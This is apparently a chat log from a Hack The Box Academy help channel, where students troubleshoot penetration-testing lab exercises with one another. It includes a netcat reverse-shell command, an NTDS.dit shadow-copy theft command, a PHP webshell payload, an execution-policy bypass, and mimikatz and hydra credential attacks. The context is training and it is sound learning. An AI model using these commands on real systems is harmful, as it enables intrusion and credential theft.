#modules
Hello, I was performing the Service Authentication Brute Forcing module on a task (FTP Brute Forcing). In the example, it shows (tcp 0 0 127.0.0.1:21), but in mine, it appears as (tcp 0 0 0.0.0.0:80) when I used (netstat -antp | grep -i list). Why did this happen? *I solved the task, but I didn't understand why I should use 127.0.0.1.
127 is localhost/loopback, 0.0.0.0 is wildcard for all interfaces which may not always be ideal
Also that shows that all interfaces are listening on port 80, likely for web requests
Are you running that netstat on the target or on your attack machine
The pwnbox is listening on port 80 to serve you the vm in the browser
ahh
generally if something is running a listener on loopback, then it's either only internal to that machine OR it's acting as a bridge to another machine through port forwarding
https://academy.hackthebox.com/module/134/section/1219
I really need help with the skill assessment. I enumerated users and found out how to find the user token, but when trying to change the password of another user with his token I'm getting access denied.
Hello! I am a newbie and doing the Linux Fundamentals. But I can't find the kernel version and what the network name is for MTU 1500. I'm doing the commands and typing in the name/numbers but it's wrong.
first: you need to ssh to the target machine
then you need to run the commands for finding out info
so I can't do it in the virtual proxy?
no
how do I ssh into it? seems I can't do it from my pc
you need to connect to the vpn
or if using the pwnbox (in-browser vm) you can ssh using that
i am running the instance in the module
the targets are generally spawned on a private network range of 10.129.x.x that you normally don't have access to
instance =/= target btw, two separate things
care to explain?
the spawn instance spawns the pwnbox virtual machine
to spawn the target, you need to click the green text that says "Click here to spawn the target"
unless otherwise stated; things in the linux fundamentals course will require you to ssh to a target machine to answer questions
oh alr. so I download the vpn file then what?
if you're using the in-browser vm, you don't need the vpn file
you can use that to interact with the target
it's also recommended to do things from within a vm, so if you don't want to use the in-browser instance - you will need to set up your own
the Setting Up module will have information regarding setting up your own pentesting environment
^
The in browser seems easier atm before i get a grasp on linux
personal preferences and whatnot ¯\_(ツ)_/¯
either way; the section should give you info on how to connect to a target
thanks I will check it out. I might have turned off my instance, gotta have to wait a day xD
generally above the first question it will instruct you to "SSH/RDP/Authenticate to <spawned IP> with username "username" and password "password""
this is why we suggest setting up your own vm
there's no restrictions on your own personal machine
is there any documentation on how I set up my own vm and connect it to HTB? as I said I'm very new and this is my first time trying linux
there's the "Setting up" module
https://help.hackthebox.com/en/articles/6369713-installing-parrot-security-on-a-vm is the htb article re: installing parrot on a vm but you can use Kali if you want
Need a virtual machine? Parrot Security has everything you need.
the in-browser pwnbox uses parrotOS
Thank you! found it now
I've noticed the in-browser pwnbox and pwnbox iso are different, which sucks because I want those nice terminal colors
gotta spend an hour configuring my bash environment
Hi guys, I feel very frustrated because I'm working on the HTB Password Attacks module (password mutation). I read the forum, but I don't understand very well lol. I read something about a policy that allowed me to make mut_password.list shorter. Do you have any hint or advice?
yes; because the htb-edition iso is not the pwnbox iso
you can likely copy the .bashrc file to emulate the terminal color schemes
it's not a policy it's literally just editing out the first 17k lines
the issue with that is it copies everything, so it copies the IP + server
it's not some special rule/policy to add to the rules file
does it?
i genuinely haven't dug too much into it
it has to display the IP and server on the bash prompt somehow
at some point i'll look at it again and see if i can get the colors
there was a website for this kind of stuff
it's also likely a bit to do with the 'theme' color
Hello back with new question in my mind
Module: tcpdump fundamentals
How do i know if sequence numbers being used are absolute or relative ?
something like best64.rule right?
no
the mutated wordlist should ONLY be created using the custom.rule and password.list from the resources
Hi! I need help. I'm studying web proxies, but when I try to start ZAP with Firefox (I saved the certificate and I created the new proxy with FoxyProxy) I lose connection! I think the problem is because I'm using a CG-NAT; I also tried to use the IP of the server (the one that FoxyProxy shows me), but I always lose connection (maybe the firewall of the CG-NAT internet provider)
using other rules will lead to an incorrect wordlist that may not include all the passwords to complete the module
np
I tried to make a vm with HTB Parrot but when I start it after I installed it I get back to the terminal where I can choose to install it again
that is the correct output size from the command
you need to unmount the iso
or change the boot order to make the vdi/vhd boot first
oh thank u
ok nice, now any advice to go ahead?
just attack the right services or use the right hashcat modes depending on what you're doing
In the password atacks medium
I got a zip file, cracked it using John, got an office document and extracted a password hash from that
Cracked that; now I was wondering how to open that .docx file to see the contents inside it
??????
openoffice is a good tool
or any other document reader
Is it in the pwnbox?
you might need to install it
Ohk
I tried hydra and crackmapexec with the ssh protocol, but without results
don't attack ssh
there's other services running
ssh is painfully slow and the target will likely timeout before it actually hits the right pw for sam
Usually ftp has the same password as ssh in some modules
Maybe crack ftp with hydra and try the same password for ssh
always enumerate the target, some questions (especially in the password attacks module) give you an end goal and you have to work towards getting there
Please need some help
what's the difference between absolute and relative sequence numbers
it just depends; https://opensource.com/article/18/10/introduction-tcpdump
absolute will be the first in the sequence; everything after is relative
I really need help with the web attack skill assessment. I enumerated all the users, I know how to find the uid's of users and how to change the password of any user. How do I progress from here?
I saw on the forums I need to find an admin user but I went through all the users and didn't find any role param or something like that on any of their requests
I just read that absolute numbers are some random lengthy numbers used for sequencing whereas relative ones are numbered starting from the first packet so they are short. Isn't this right?
yes. now answer the question from the module
well that's what's bugging me, it is saying the answer is incorrect.
well then break down what the question wants from you
it's likely asking based on x data what is y value
Thank you.
Can anyone provide help with the Password Attacks module, specifically the Pass-the-Hash chapter? I am stuck on connecting to DC01 shared folder for David and Julio. Any help is appreciated!
do you already have the hash?
got the hash dump from mimikatz, just struggling with what tool to connect to the share
share, sounds like SMB
windows though doesn't have a specific tool to connect to shares
I believe I need to pivot from the machine I RDP'd to (MS01) as it can see DC01 but when I try to target DC01 with mimikatz it says I am still on MS01 in the cmd that pops up
^ did you use the dir command?
the pth technique is launching a prompt in the context of the user you're impersonating
Is that instead of the cmd.exe?
Oh well I feel stupid now lol
that has worked, thank you very much & thank you @soft cedar
I realize that but I am not allowed to talk in most channels
Hi everyone, sorry for writing but I need a little help. I'm in the form
Meterpreter Tunneling & Port Forwarding
I started an ssh tunnel with the target, in fact meterpreter works well. except that when I go to boot via metasploit
server/socks_proxy always gives me:
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 12.
[] Starting the SOCKS proxy server
[] Stopping the SOCKS proxy server
furthermore, wanting to answer the second question I have to use autoroute, which, configured as it says in the module, and done ''run'', tells me:
run
[-] Msf::OptionValidateError The following options failed to validate: SESSION
[*] Post module execution completed
Can anyone give me a hint?
in order to use autoroute you need to first initiate a session in metasploit
as it's a post-exploit tool
are you exiting the session or closing it when you go to do autoroute
also for autoroute you need to specify the session
follow the instructions from the module to a T
since it asks me for 172.16.5.19 should I change the subnet?
can you list the sessions
it looks like you have two separate msf things running, which is likely why things aren't working as you want them to
because you need to run this from the msfconsole that has your connection running
:) which is why it's all failing
follow the instructions explicitly to a T
I'm sorry, what do you mean by ''T''?
I have opened 3 metasploit sessions, so are you suggesting I do everything from a single metasploit session?
"follow X to a T" is a saying. it just means follow all the instructions provided carefully
^
yes
each metasploit session cannot see each other
hahaha LOL, not being an English native speaker I don't know these sayings, too bad
I'm telling you to read and follow the section directly
it tells you how to background the session to perform the tasks as required
Now I'm rereading everything very carefully
sorry to bother you, I tried ftp but it doesn't work. I'm gonna crash my pc
it will work
perhaps increasing the threads will help you
48 seems to be the most stable for many
are u sure that 94k is the right file?
yes
it's the intended file to be created
you just gotta have patience
it takes ~ 20 minutes to get the password on 48 threads
ok,so I just wait
this module is a HUGE lesson in patience
In Hacking Wordpress - User Enumeration,
Q: From the last cURL command, what user name is assigned to User ID 2?
I found two users already other than admin but they are not working as the answer.
Help!
I just broke devvortex lol
didn't check the code I tried to insert and there was an error, resets not being done right now.
it works!!!!!!!!!!!!
damn, no more resets for the day. this thing is broken now, sorry everybody
wrong place buddy
this channel is for assistance and discussion around htb academy modules
ah okay
#boxes for generally asking for hints/nudges with boxes
and if you really want to just message support and see if they can reset the box for you
Need to speak to a person? Learn how to reach our support via HTB Labs.
thx
I still desperately need a clue, CBBH people help me out
you mean the grep extract? I didn't find any username that stands out
that does not work like that; I give it uid's from 1 to 100 and it gives me back usernames
there are only 100 users and they all look like general names
going through all of them manually will take me hours
yes
I did
there is no username called admin or any mention of admin, I searched more than once
fuck, I found one
thanks for the advice it helped
finally got my vm to work xD what's the inode number and hints on how I can find it? can't remember if I read it somewhere
man ls might be useful for you to read
but also: you will need to connect to the target to be able to get the right answer
make sure you have the vpn running
yea I struggled with that for 2 hours
ig " ls block-size /var/backups/shadow.bak " is correct?
no
also before asking is "x" correct run it and see
you're in an isolated environment - worst that happens is it breaks and you need to restart it
Hi everyone, I seem to have found a content fault in one of the modules in Linux Fundamentals. Any idea where I can flag this?
I was typing it to remember, I was just typing when u said no xD
Thank you
again; do first ask later
ye
inode can be a form of an index
Thank you so much for helping a newbie :D Found it instantly when u said index
So what's the difference
learning how to research information on your own is vital
yea I get that, everything is just new to me. sorry
You don't have to apologize. Everyone here started from scratch at some point.
Google is a valuable tool, even ChatGPT can be useful for explaining concepts
Has anyone finished Abusing http misconfigurations?
idk probably
just ask your question and someone that's done it might be able to assist
Use WCVS to identify an HTTP header vulnerable to web cache poisoning in the provided web application.
it generally helps others to help you by providing info on what you've done so far that isn't working
Hello colleagues, I have a question related to the Cracking Passwords with Hashcat module: "Extract the hash from the attached 7-Zip file, crack the hash, and submit the value of the flag.txt file contained inside the archive."
What's the question?
The module shows you how to use the tool
I have done what it tells me to do, unzip the file and extract the hash; at the time of decrypting the hash I get the answer but at the time of validating it I get the wrong answer
make sure you don't have any extra spaces or anything in your answer
But on hashcat the status is cracked
@acoustic owl I don't understand what you are asking. I did everything described in the module and I got the result, I don't know what to write in the answer. I wrote all the target headers but I couldn't find it, can you give me a clue?
try to do the command but with --show in the end
Look in the output under ||Header Poisoning||
I had a read error because I was supposed to decrypt the hash and read a file flag.txt, which is where the correct answer was, thanks anyway
@acoustic owl I found the answer thank you. But I don't understand what it means. X-F*******
This is a header field
hi
#1204439923126575235 if you believe the challenge isn't behaving as you expect
Hi there, I'm stuck in the Broken Authentication module, predictable reset token. I can't understand how the token is generated. I converted the timestamp date displayed to epoch milliseconds, then appended it to the htbuser string and hashed it with md5, however the token is different from the one shown.. any idea on how it is built?
basically I did md5("htbuser" + str(epoch_ms))
yeah I know but first I'm trying to generate my own token to understand the algorithm
hey Xre0uS, on the DACL skill assessment I just ended up using mimikatz to grab jose's hash and complete the module. is that the way you were talking about yesterday?
yeah unless you know the exact millisecond the token is generated, you won't get the same hash
you can use powerview or rubeus
mh, okay so I will try to directly find the admin one, thanks
if you have a rev shell it will be easier since the given webshell is crap
lol he just said that
Hello, I have a problem with this command, can you help me please?
"C:\Users\Administrator\Downloads\nc.exe -e cmd.exe 10.10.15.141 443" this?
yes
you can see in the error it's saying the path can't be found
no
it's saying explicitly that HKLM:\... can't be found
learn to read your errors my guy
I simply followed what the course laid out sorry
the example doesn't have HKLM:\
there is no :
that powershell is incorrect
the HKLM path doesn't use : as it's not a network mapped drive
wth am I doing wrong?
well it looks like something is broken with the script
which is entirely an intended thing by the author as it's not a plug and play script from what I know
Usually the course is good about mentioning things like that. From what I can tell it should be plug and play. Looking at the code itself there's no mention of foundeR_enum.sh anywhere. The line at 51 looks correct to me also but my coding is subpar at best
what's the link to the repo?
any idea why the payload is not executing? I tried using pht and phpt too, the results are the same. when I check the source code I find opening quotes so I try to close them but the result stays the same. I even tried using the <script> tag. I tried using the simple php payload.
<?php system('ls'); ?>
thank you x3dnesse
Are you looking for this? https://github.com/dpgg101/GitLabUserEnum
I take it this is provided by the section?
correct, "this one" is the link provided in the course material
and they also include the python link
use the python 3 one
๐
python3 worked for me np
I had tried it but had some issues with it as well so was trying to get the primary to work. I'll give it another go
edit: worked w/o issue after re-cloning it, I'll just use this one, thx.
i wonder if the cp/paste is including the header info for the bash script
perhaps when you copy/pasted it some of the info got messed up
I downloaded it then copied it over into another folder, had the issue so copy pasted it as well with the same results.
what happens when you just run ./gitlab_user_enum.sh
also how did you download it would be the more precise question ig
right, that's what i was thinking. show the command you used to download it, and show the results of the python script not working
to clarify, py works fine, so using it. That being said I just clicked the download link. and just running it w/o any arguments results in the same error
because I threw the code into an online bash compiler and it runs the code just fine
it didn't throw any sort of error at me
redownloaded it via visiting the link and clicking the download button
So weirdly enough if I just copy/paste the raw and try to run it, it eliminates all the other bs but still errors on line 51. but again python works fine so it's kind of a moot point, but would like to figure out tf I'm doing wrong in case I have the same issue later.
you'll need to know bash scripting to fix it. I think it's saying error with syntax on line 51
yeah my guess is you didn't dl the raw file
that's why i wanted to know the command he used to download it
honestly didn't know there was another way besides copy/paste raw or hitting the DL button (for exploitDB at least)
wget <url to raw file>
any help on "Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode, by adding a loop to 'xor' each 8 bytes on the stack with the key in 'rbx'." Intro to Assembly skill assessment
#modules message
okay thank you, that's what I was trying to do but the shellcode, I got the same keys when I run the xor instruction
yea I'm trying to analyze the files and I literally see 0 difference between the file generated by the download button, and the one from raw
weird right lol
any pointers?
FIGURED IT OUT
the download button adds a carriage return which isn't getting parsed by bash
i always use the raw file heh
no idea what that means but I'ma look it up lol
it basically appends \r to all the lines
instead of new-line
vvvv
whereas the raw file just says it's ascii text
that's why the errors on those other lines weren't outputting anything because it was erroring out with a carriage return which your terminal interpreted as the 'enter'/whitespace
WhiteBox Attacks: Remote Code Execution I've completed this section's exercise. But, I feel like there is a waaaay better approach to exploit it. I'd like to discuss this with anyone that's already completed it.
solved the riddle of the fuckening; the download treats it as a CRLF file, which isn't handled correctly by linux systems
did you figure it out?
doing the skills assessment for the Pivoting module.. how do I stop port forwarding on my attack host
You generally don't port forward on your host, you forward through the pivot
I did do a local port forward to scan the target network using proxychains for more victims
Again you don't generally forward on your host, you forward the request through the victim
so once I disconnect from my current target I'm not forwarding anymore?
Correct
any help why this is not working? I fuzzed and tried almost all the extensions
gotcha, okay makes sense why netstat -antp only works when I'm connected to my target
In order to forward traffic there needs to be a route
okay this is starting to make sense
this for sure has been the hardest module to comprehend.. feels like inception
Think about it like taking multiple trains. Train A gets you to the station that gets you to train B. Train B gets you to C... repeat until exhausted
I like that analogy better, my brain hurts less lol
At each stop you can "scan" the map of the Train system that you didn't see before
yeah.. yeah it definitely makes way more sense when you put it like that, thank you!
not yet
where are you stuck at
idk, if the loop I wrote is right or not
there isn't much to it really, point RDX to the top of the stack, then xor the stack with the key which is in rbx, move the pointer by 8 every loop and loop 14 times
can I dm you ?
sure
Anyone able to provide insight on the Attacking Tomcat CGI section? Following along with the course I'm able to get to the welcome CGI page, however trying to append &set or &dir results in a 404 page
did you figure it out?
yo for CPTS do you have to share screen? how do they proctor that
They don't proctor it from my understanding. You're allowed to use outside resources
I cannot connect to this spawned RDP server to save my life
You don't need to go there
Go to /manager
You will have a login page
Then you can use metasploit to do the rest
use ' ' for the password
Tried that earlier. Same result.
Wait I found a typo, nvm.
Does it have a /drive: option like I usually do with xfreerdp?
uhm.... it's built on top of xfreerdp so I'm sure there's a way to configure it
but idk.
not a problem with xfreerdp
you can see the error there, it says login failure
idk what part you're on but remember not all users have rdp rights
I try to avoid metasploit at this time (partly for OSCP prep, partly so I have a better understanding of what's actually happening)
you're missing one character in the url. look closely.
No issues go to the /manager
Then you will have to move forward
the section is about Tomcat CGI, manager is a separate thing
Anyone able to help? Getting an error trying to rdp into DEV01 on the Attacking Enterprise Networks - Lateral Movement section. - Timeout waiting for activation error -
/timeout:60000 works. Going to pop this in chat anyway in case it helps someone else
But @next bronze
@ember coral said attacking tomcat
Ok no issues
Attacking Tomcat CGI section
happened to me a lot , just refresh HTB page and try again
@ember coral I have dm'd you
Hi guys, I need a bit of guidance on the Public Exploits module. The question says to identify services running on the given server, but when I try to run nmap on it I get an exception saying 'failed to resolve "Ip-Address"'. A little perplexed by this
Mmmm...
Tunneling is active??
If it's active then I think everything should work fine
Or just reset the IP and try again
you can dm me, I'll give you a hand offline.
I've been stuck on this question in the active directory privilege access module "What other user in the domain has CanPSRemote rights to a host?"
Has anyone completed this module? lol
I'm on AD skills assessment I, still on the webshell, Q2, I can't import PowerView, I did upload it but it won't work
any hints on how to proceed
maybe I'm using the wrong syntax to import it?
use a spoiler tag and show how you're importing it.
dm me, I can give you a hint offline if you need
||Import-Module -Name "C:\PowerView.ps1"||
since ||Import-Module .\Powerview.ps1|| didn't work either
seems to me you're not using the right folder. show the actual command and the result it gave.
generally things aren't stored in the root folder of the drive
how do you make a spoiler tag for image?
|| ||
anyways this is what i get
after that this error
try typing "Import-Module P" and then pressing tab
tried it but it won't work either
Import-Module : The specified module 'PowerView.ps1' was not loaded because no valid module file was found in any module directory.
it looks like it's importing it successfully, but there's something wrong with the script and it spits out a bunch of errors
hmmm
yep there you go, wrong link
this is the correct file: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
you can't just copy the webpage, you have to download/copy the raw file
I'll try again with this new file
from the webshell?
look at your link and look at mine
your link is an actual website that contains the file in a code box
mine is the actual file within the code block
if you click on "raw" on your link, it'll take you to the actual file
that's the file you need to use
oooh you're right
thanks man, it worked now :3
guys when running an nmap scan with proxychains.. is there a flag or something I can give it so it only shows me successful or refused connections?
np
not sure, maybe -vv?
but even after importing, I should use PowerView commands in the directory where I imported that module, no?
once you've imported the module into your session, it should stay there unless you close the powershell window and open another one
but I get errors when executing the PowerView command
it says command not recognized
show the command
||Get-DomainUser * -spn | select samaccountname||
did you import powerview
yes
just show the screen shot
looks ok, did you -ep bypass?
what's that lol
I'd have to go through it to see what it's doing so I'm not sure, I think that's the right command after a successful import
generally you need to set the execution policy bypass when doing stuff like that
did it work for you when you did this skill assessment?
I don't know what module you're on
Active Directory module
I haven't gone through that
on skills assessment I
oh I see
is there any method to get a rev shell back to my host from the webshell?
yeah
type Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
then import pv again just in case, and try again
I'm sure the answer is in the module
I would go over that part again or something. but yeah if you have command access on the computer you can reverse shell easily
can I dm you?
ok
hey guys, I can't message #general rn, what's going on
it says to check out #modules, I don't understand
Anything wrong with this:
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit
on Network Enumeration right now.... trying to get the hostname of the target. I've tried -sV, -sn, -v -sn, and can't seem to find the hostname. Most nmap results never load/load indefinitely. Should I be looking somewhere else?
@shut wraith does C:\NTDS\ exist on ur machine?
I have copied it successfully. But I have a new problem:
if I have the NTDS.dit file from a target machine but I don't have admin, so I can't get the SYSTEM file in order to extract the info from NTDS using secretsdump, then what do I do?
@shut wraith does your target have any exploits? have you googled/msf'd them? is gaining higher privilege out of the picture?
I think you need admin rights to get ntds.dit, don't you?
If I find exploits, such as maybe by using mimikatz, then I get admin; then what is the use in extracting info from NTDS if I already have admin
transfer it to your attack host
?
you need admin to get ntds.dit... then you say you can't get system because you don't have admin? it doesn't make sense
Okay I transferred it but now what?
nvm you still need the SYSTEM file
you probably have admin rights since you got ntds.dit btw, why can't you get the system file
I'm stuck on the Pivoting skills assessment. I got into the first ||windows server|| where you have to grab the ||lsass dump|| but I can't figure out how to move it from the target host to my attack host. ||I even tried to remote dump it with lsassy and nothing happens||. I'm assuming it's because since I'm using a pivot host to it, it can see my attack host ip..
Thanks
you can move it with /drive parameter when using xfreerdp
xfreerdp /v:[ip] /u:[user] /p:[pass] /drive:/path/to/whatever
I didn't even know that was a thing
then check the file explorer, you should have a new drive
let me try
then copy paste should work to transfer whatever
that worked, very useful, thanks!
hello, I am new here. I know some basics about hacking, is there anyone who can help me to improve myself
Np
I suggest following a job role path in HTB Academy; it's 7€/month if you are a student and you have access to almost every beginner/intermediate level module
If you are new to hacking I'd also suggest starting with fundamentals; I guess there is a module or path covering fundamentals before diving into a job role path
you can do the Information Security Foundations skill path for penetration testing or the SOC Analyst Prerequisites skill path for security analysis
help please
Module: Windows Privilege Escalation
Section: Interacting with users
Question: Using the techniques in this section obtain the cleartext credentials for the SCCM_SVC user.
I've set up Responder with the .scf file placed in C:\Users\Public\Downloads\ but I am only able to get hashes from htb-student. I am not getting any hashes from SCCM_SVC
did the module go over coercion?
on the Linux Fundamentals module, in the Working with Web Services section, I started an http server without the use of npm in the startup command
yet the command I used to start it isn't the flag it's looking for
any ideas on what to do?
what does the question say to do
I haven't done that module so I'm not sure what the goal there is
Find a way to start a simple HTTP server inside Pwnbox or your local VM using "npm". Submit the command that starts the web server on port 8080 (use the short argument to specify the port number).
I need someone to learn the skill of hacking devices connected to the Wi-Fi network
but after installing the http server package through npm
well, it seems to want you to use npm
it's literally just
and you said you didn't.. so maybe try npm?
http-server
I did use npm to install the server
the command to start the server is just http-server -p8080
I can even see the get traffic
but it doesn't like the command I did
how did the module teach you to start it with npm
it didn't
did you try typing in your answer that starts with http-server?
@cloud urchin you can help learn the skill of hacking devices connected to the Wi-Fi network in kali linux my friend plz
can you show the whole command you typed in a pic
check the modules
This is after using npm to install the server package
there's a lot to learn, you should look at the modules on the website
Ok
that command works and is working right now
after npm it wants me to do php, which it also doesn't show you how to do
it only ever shows you python3
How i can find it plz
htb academy
Tnx
from what I'm reading the question comes up because it's poorly worded, I sent you a dm rei
@cloud urchin What is the hacking tool for devices connected to Wi-Fi? Plz
stuck in the Pivoting assessment. I found the next user's creds so naturally I'm looking for the host to hop onto. I ran a ping sweep in PowerShell from the ||windows|| server. all the results come back as false..
Weird, there should be hosts alive
I can run it again, let's see if it does anything this time
You did || 1..254 | % {"172.16.6.$($_): $(Test-Connection -count 1 -comp 172.16.6.$($_) -quiet)"}||
Right?
Check for the ip you may have left .5 and forgot to change it to .6
shit your right, im looking at the ipconfig of that target host
i thought i saw .5 on both nic configs
I've been staring at the screen too long
You are almost there you got this
damn they're all still coming back as false
this is what i ran ||1..254 | % {"172.16.6.$($_): $(Test-Connection -count 1 -comp 172.15.6.$($_) -quiet)"}||
ran the CMD ver and i got a hit
finally!
On Skills Assessment - File Upload Attacks i found the upload path, i found the extension, but when i try to access it i receive 404. I tried with a jpeg file and still 404. Is there a problem with the machine?
i highly doubt it. every time i thought that there was another answer. i would go over the module that covers that part and pay close attention, there's usually some key piece of information in there.
Has anyone been completing a box in the skill assessment and broken it? I somehow broke the box twice after obtaining a reverse shell and I couldn't use and basic commands like sudo, id, whoami or anything
use any*
there's many skill assessments and many modules
gonna have to be a little less vague my guy
what kind of shell was it, not all are stable
I just mean any box. This isn't the first time or first box. But I'm currently on nibbles (priv esc) and I used the meterpreter vulnerability to obtain access
the getting-started nibbles box can sometimes be tricky
yeah meterpreter has staged and non-staged payloads, not all are stable. best to pivot to another process and obtain a stable shell.
just follow the guided instructions for the most part and you'll be fine
it was going well until basic commands stopped working. I was trying to use sudo to run a program and it said sudo command not found even though I used it a few minutes earlier to see what sudo commands I had access to
were you in the shell
yes
screenshot?
I think I should just take the private ssh key and go in that way instead of meterpreter
generally that's the smarter idea
Thank you
you just saying things aren't working doesn't really help us, if you provide screenshots it's easier for us to point out where your mistake may be
the guided portion guides you through doing it without msfconsole
I didn't have a chance to. I reset the box twice and didn't have it open when you asked for a ss. If it happens again or anything I can take one though
i am stuck at xss phishing. when i tried the attack on myself it all worked, but when i give the url to the victim it shows invalid url, so what do i do next???
@everyone
that's disabled
also trying to ping everyone in a huge server is just a dick move
just be patient
i tried this task from yesterday but no help
@fathom pendant It happened again and I have screenshots. I just spawned in a new instance and target to have everything reset and immediately set up the shell because I knew all the information I needed
shell
this is what I meant by dropping into your shell
You can use the help command to uncover the supported commands in the reverse shell session you established
you have a session; but you're not in the shell
I appreciate you so much. Thank you
In AD skill assessment II when we ran bloodhound through the linux host, it didn't show all user info. But when we collected info from the MS01 machine using the same ldap password we got the results. Why this difference?
Different results from different machines.
xss issue in sending url can anyone help???
It is the same set sam lab, maybe different perms but not sure what
try changing your approach
you say it's telling you invalid url. are you including the index page in your phishing attempt
yes
Module : AD Enum & Attack (Skill Assessment I)
Question : How did you guys find the tp***y clear text password? I tried with hashcat -m 1000 since it is an NTLM hash and used rockyou.txt and other SecLists wordlists, still can't crack the hash
Hint lsa*
I got the ntlm hash of the user ady using sekurlsa::ekeys / sekurlsa::loggedonPasswords
sometimes passwords can't be cracked
@rustic sage thanks for your good response. i have now solved it using the htb pwnbox, but the things that i apply on the pwnbox are the same that i apply on my local machine and it did not work there; it only works in the htb pwnbox
then you are likely missing a crucial part; even if you copy/paste there may be some things that you're missing to do in your local machine
@fathom pendant i copied the payload from my linux history and used it in the pwnbox and it works. i also explored the htb forums, there are some writing about the pwnbox, so i tried in the pwnbox and it works
¯\_(ツ)_/¯
well the question here is asking for the user's clear text password, so i don't think the "passwords can't be cracked" would be useful no offense.
there's more than one way to obtain cleartext credentials
someone earlier suggested ls*
hes trying to tell you to look somewhere else
noted , I'll try harder but fyi tried lsadump, secrets and wdigest for cleartext password no use (mimikatz tool)
lmao finally got it, dump was right just need to edit something in the registry lol
Sorry, it was my fault. I forgot to edit sysmon config file so that it logs ImageLoad.
just this gave me an idea. What if you included characters like what hashcat and other software use to define the patterns. Or somehow engineered it so that it would be impossible to define in the usual software
that's not how it works
by unable to be cracked; i simply mean that it's not in the common wordlists we'd use
yeah but you could make a literal impossible to crack password for a specific software if it's not possible to define the pattern
or make it so difficult to define the pattern with tons of backslashes
except most hashes have a predefined signature that identifies them
you also don't generate the hashes yourself
an algorithm generates the hashes
well I have. but its not like im doing this on the daily.
again for the purposes of everyday/common situations: you aren't generating your own hashes out of thin air
you are using an algorithm that uses predefined methods
wait... isnt that an identical problem though? you define a pattern that defines a pattern
its just a matter of syntax
either way; most hashes have a predefined key identifier
this is referring PURELY to password hashes
not base64 or hex obfuscation
yeah. would be pretty interesting to make a website that javascript checks so that your password is not in the common patterns they guess
would make your password like +100 points stronger
again it's not a common pattern my dude
I mean like in a register form
the patterns are usually combination of wordlists + brute force
there's also haveibeenpwned
so like Panda123 will get cracked
and any variation of it
as long as it's following the provided ruleset governed by the site
certain characters are blacklisted in password creation
but you could design a system that knows it will not usually check for a 2nd upper case so PAnda123 might never get cracked even though it's the same length/difficulty
except that's not how a tool like hashcat works lmao
it literally is
i'm not gonna argue this with you
its because you misunderstand what I'm saying lol
likely we're both not understanding each other
I'm saying you take the default rulesets, and now you create all your passwords so that they dont fall in those
so they will not get cracked
except there's dozens of rulesets that you'd have to account for
this conversation is veering far off-topic
aye. just interesting idea I had. will probably implement some time. later
and someone can always create their own ruleset that basically invalidates your tool
yes but you're not supposed to have 100% fool proof. 99.999999999% is good enough
that's assuming a lot
the most you can hope for in any software solution like that is 80%
there's more efficient rulesets that get more matches. so it naturally gravitates to the same ones. there's not much point in very specialized ones (for english)
Hello colleagues, I want to know where I can practice more on the Hashcat module (Cracking Passwords with Hashcat). I see that it is a very important topic and there is no more robust miscellany of exercises to test the concepts.
password attacks uses hashcat a fair bit
unfortunately, while i understand what you mean, it isn't nearly as effective as you would expect
say hashcat 3 times and chick3nman appears
haha
do you want to discuss on another channel? (i can't join #general yet) i'd really like to hear your take
is there an off topic somewhere you can access?
reading and following #welcome allows you to access more channels
i just heard about the hackbox thing. I was 99% done with the registration but my computer broke xD gotta do it again
the only channels available for non-linked accounts are the academy channels, the active ctf channel, and the community help channel afaik
hmmm, ok, wasnt aware of that
jajajajaj
threads aren't enabled in this server
easily abused feature
Am doing the skill assessment for the login brute force and my machine keeps timing out before the brute force is over.
i really feel like cheating for this exercise.
I see that in the module they talk a little bit about everything, but there are no exercises to practice the topics with several exercises, only those they have as such in the questions and in the last section
well.. in short, why do you think it wouldn't be as effective? I'm thinking almost all password cracks are done in bunches with some sort of default settings (site rules permitting)
Well, you can cheat, but if you do that, study why. Sometimes when I can't get a command to execute and I don't understand the subject, I try to find the reason for the answer; that seems effective to me
cheating only hurts yourself; try and find out what's failing
are you trying to brute force a service that's painfully slow
is your username/password list just bad
did you skip a step that was taught earlier in the module?
Out of the box "run rockyou w/ onerule" style attacks will certainly have gaps, and you are right to assume that you could craft passwords to avoid them and even avoid many other "common" wordlists or rules or even combinations thereof. But that's an extremely limited attack scope compared to what is both possible and even what is in "common" use. This concept of crafting passwords that avoid common attack is actually something I like to do from time to time to mess with other crackers, as a bit of a friendly challenge. I will craft a very simple looking password, short and common root and minimal modifications that will be rather difficult to crack with attacks like that to highlight those sorts of gaps. But pretty much every one gets cracked eventually. It may be minutes or perhaps even as much as hours after, but almost never more than that. The "evolution" of attacks, especially for experience crackers will eventually cover so much ground that intentionally avoiding it is incredibly difficult(sorta).
I meant to take it a step further and enforce such passwords on a web service. So the JS checks that the rule set will not catch it. Instead of arbitrary rules
With rule stacking, random rule generation, guided rule generation, a huge number of wordlist generation and assembly schemes, etc., you will never avoid everything with a hand crafted scheme like that
then you're breaking out of password cracking
and moving to bruteforcing
it's FAR easier to make passwords that are 100% uncrackable, by anyone, effectively ever
like, so easy that it trips people up all the time
it's why password managers are great for secure passwords
right
because they remove the human element of password generation, which is the weakest
but now you have a single weak point
no password is best
my steps are as follows
- i created a custom username and password list for harry potter using cupp.py and username_anarchy
- i used sed to reduce the number of pass to meet the password requirement of 8 char min,numbers and special char
then i ran hydra -L username -P password ssh://ip:port -t 4
i reduced the pass count from 25000 to about 9000
ehhhh sorta
but the threatmodel that makes a modern pw manager a single point of failure is far beyond what most people are actually likely to ever encounter or even reliably plan for
sounds like it's forcing you to brute ssh
no password is more secure than a password https://www.microsoft.com/en-us/security/blog/2023/05/04/how-microsoft-can-help-you-go-passwordless-this-world-password-day/
Learn why going passwordless makes your organization more secure while improving user experience and how Microsoft Security can help.
lol
you know what I do. I create a pass phrase but in a language(s) that doesn't exist and only has a meaning to me so I can remember it. Never write it down; if I have to write it down I burn it and put the ash in multiple different bins (true story). (end result -> very long pass phrases that can be remembered easily and will never catch on a wordlist)
tokenization is a fun thing
yes the exercise is to brute the ssh
just extend the lab time for a bit; also are you sure you generated the lists properly, and that you followed all pw rules required
i believe that module goes over how to determine those min/max rules
it's so easy to create "uncrackable" passwords that I'm honestly shocked at how many people are pushing for killing passwords in favor of systems that move goal posts and usually complicate auth models for minimal if any security benefit
